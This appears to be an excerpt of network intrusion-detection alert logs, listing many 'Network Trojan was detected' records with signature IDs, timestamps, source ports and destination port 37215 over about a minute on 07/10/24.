                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332212
                  SID:2829579
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.784198
                  SID:2829579
                  Source Port:56168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.442977
                  SID:2835222
                  Source Port:58454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.356991
                  SID:2829579
                  Source Port:57514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2835222
                  Source Port:57542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.804395
                  SID:2829579
                  Source Port:41006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.011006
                  SID:2835222
                  Source Port:38800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034911
                  SID:2835222
                  Source Port:56476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.172380
                  SID:2835222
                  Source Port:60722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2829579
                  Source Port:35806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.112679
                  SID:2829579
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.106591
                  SID:2829579
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.006424
                  SID:2829579
                  Source Port:45830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487648
                  SID:2829579
                  Source Port:40464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289200
                  SID:2829579
                  Source Port:56650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2829579
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.334511
                  SID:2829579
                  Source Port:33594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162880
                  SID:2835222
                  Source Port:45446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623094
                  SID:2835222
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2829579
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.576529
                  SID:2829579
                  Source Port:56860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.365798
                  SID:2835222
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.954734
                  SID:2835222
                  Source Port:34668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.527687
                  SID:2835222
                  Source Port:52164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562058
                  SID:2835222
                  Source Port:48300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115702
                  SID:2835222
                  Source Port:54462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2835222
                  Source Port:41092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.613798
                  SID:2835222
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652813
                  SID:2835222
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.852071
                  SID:2835222
                  Source Port:46684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869834
                  SID:2835222
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2835222
                  Source Port:38532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2829579
                  Source Port:49542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.187114
                  SID:2835222
                  Source Port:49616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2835222
                  Source Port:47570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.664786
                  SID:2829579
                  Source Port:50288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.591498
                  SID:2835222
                  Source Port:58582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2835222
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397079
                  SID:2835222
                  Source Port:57724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833151
                  SID:2835222
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522185
                  SID:2829579
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2835222
                  Source Port:47240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670827
                  SID:2835222
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:43876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2829579
                  Source Port:41920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2835222
                  Source Port:57708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507616
                  SID:2835222
                  Source Port:36980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2835222
                  Source Port:36554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.458105
                  SID:2835222
                  Source Port:55406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2835222
                  Source Port:40590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:54614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944748
                  SID:2835222
                  Source Port:58050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2829579
                  Source Port:38628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.815031
                  SID:2829579
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823884
                  SID:2835222
                  Source Port:42372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2829579
                  Source Port:60220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2835222
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.518597
                  SID:2829579
                  Source Port:42608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599801
                  SID:2829579
                  Source Port:36684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724469
                  SID:2829579
                  Source Port:58400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317652
                  SID:2835222
                  Source Port:55032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2829579
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2835222
                  Source Port:42056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2835222
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2829579
                  Source Port:55312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.482822
                  SID:2829579
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847226
                  SID:2835222
                  Source Port:35400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2829579
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.364468
                  SID:2835222
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2835222
                  Source Port:46148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901801
                  SID:2829579
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2835222
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619153
                  SID:2829579
                  Source Port:50826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936367
                  SID:2829579
                  Source Port:56840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967012
                  SID:2829579
                  Source Port:37196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320405
                  SID:2829579
                  Source Port:38232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.870482
                  SID:2829579
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497037
                  SID:2835222
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342046
                  SID:2835222
                  Source Port:50864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2835222
                  Source Port:56854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2835222
                  Source Port:59130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574269
                  SID:2835222
                  Source Port:47722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856431
                  SID:2829579
                  Source Port:50392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376308
                  SID:2835222
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.178042
                  SID:2829579
                  Source Port:54058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907350
                  SID:2829579
                  Source Port:34176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.111278
                  SID:2829579
                  Source Port:56190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.258130
                  SID:2835222
                  Source Port:36516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.663550
                  SID:2835222
                  Source Port:51192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121645
                  SID:2835222
                  Source Port:53822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2835222
                  Source Port:55336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.833154
                  SID:2829579
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.644990
                  SID:2835222
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2835222
                  Source Port:37540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012931
                  SID:2835222
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035645
                  SID:2835222
                  Source Port:33986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2835222
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655203
                  SID:2835222
                  Source Port:55124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.441013
                  SID:2829579
                  Source Port:51628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978564
                  SID:2835222
                  Source Port:46602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2835222
                  Source Port:41804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249351
                  SID:2835222
                  Source Port:38318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.583179
                  SID:2829579
                  Source Port:36472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2829579
                  Source Port:58872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186455
                  SID:2835222
                  Source Port:57700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879292
                  SID:2835222
                  Source Port:55516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2835222
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.768193
                  SID:2829579
                  Source Port:39364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2829579
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202550
                  SID:2835222
                  Source Port:57876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971470
                  SID:2829579
                  Source Port:59956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514897
                  SID:2835222
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:58112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866134
                  SID:2829579
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641843
                  SID:2829579
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2835222
                  Source Port:36732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2829579
                  Source Port:46296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.957397
                  SID:2829579
                  Source Port:55566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.824956
                  SID:2829579
                  Source Port:40886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422103
                  SID:2829579
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.523308
                  SID:2835222
                  Source Port:45388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.085060
                  SID:2835222
                  Source Port:33692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541025
                  SID:2835222
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.759865
                  SID:2829579
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.894621
                  SID:2829579
                  Source Port:52222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.364562
                  SID:2829579
                  Source Port:37052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.783011
                  SID:2829579
                  Source Port:45106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2829579
                  Source Port:43334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2835222
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386959
                  SID:2829579
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.576804
                  SID:2829579
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440682
                  SID:2835222
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2835222
                  Source Port:53778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2829579
                  Source Port:52062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.435544
                  SID:2829579
                  Source Port:38048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2829579
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2829579
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2835222
                  Source Port:45370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734254
                  SID:2829579
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421608
                  SID:2829579
                  Source Port:49324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.165242
                  SID:2835222
                  Source Port:45356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2829579
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2829579
                  Source Port:47474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2835222
                  Source Port:38256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2835222
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2835222
                  Source Port:41866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.810736
                  SID:2829579
                  Source Port:48088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.594694
                  SID:2835222
                  Source Port:37962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823206
                  SID:2829579
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384932
                  SID:2835222
                  Source Port:49322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2829579
                  Source Port:45256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.476844
                  SID:2829579
                  Source Port:59788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823604
                  SID:2835222
                  Source Port:44304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159538
                  SID:2829579
                  Source Port:58268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538124
                  SID:2829579
                  Source Port:51776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2835222
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.375849
                  SID:2829579
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000854
                  SID:2829579
                  Source Port:53372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2829579
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034414
                  SID:2829579
                  Source Port:48430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.168887
                  SID:2829579
                  Source Port:50534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110182
                  SID:2829579
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.995409
                  SID:2835222
                  Source Port:60980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.898408
                  SID:2835222
                  Source Port:40806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2835222
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201390
                  SID:2829579
                  Source Port:58156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2835222
                  Source Port:32872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165580
                  SID:2829579
                  Source Port:56352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2835222
                  Source Port:60788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.771362
                  SID:2829579
                  Source Port:53012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.475374
                  SID:2835222
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312425
                  SID:2829579
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2835222
                  Source Port:53138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502645
                  SID:2835222
                  Source Port:58240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2835222
                  Source Port:32776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.595344
                  SID:2829579
                  Source Port:36470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2835222
                  Source Port:40372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:54490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607531
                  SID:2829579
                  Source Port:55994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.036328
                  SID:2835222
                  Source Port:59520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.228026
                  SID:2835222
                  Source Port:51656
                  Destination Port:37215
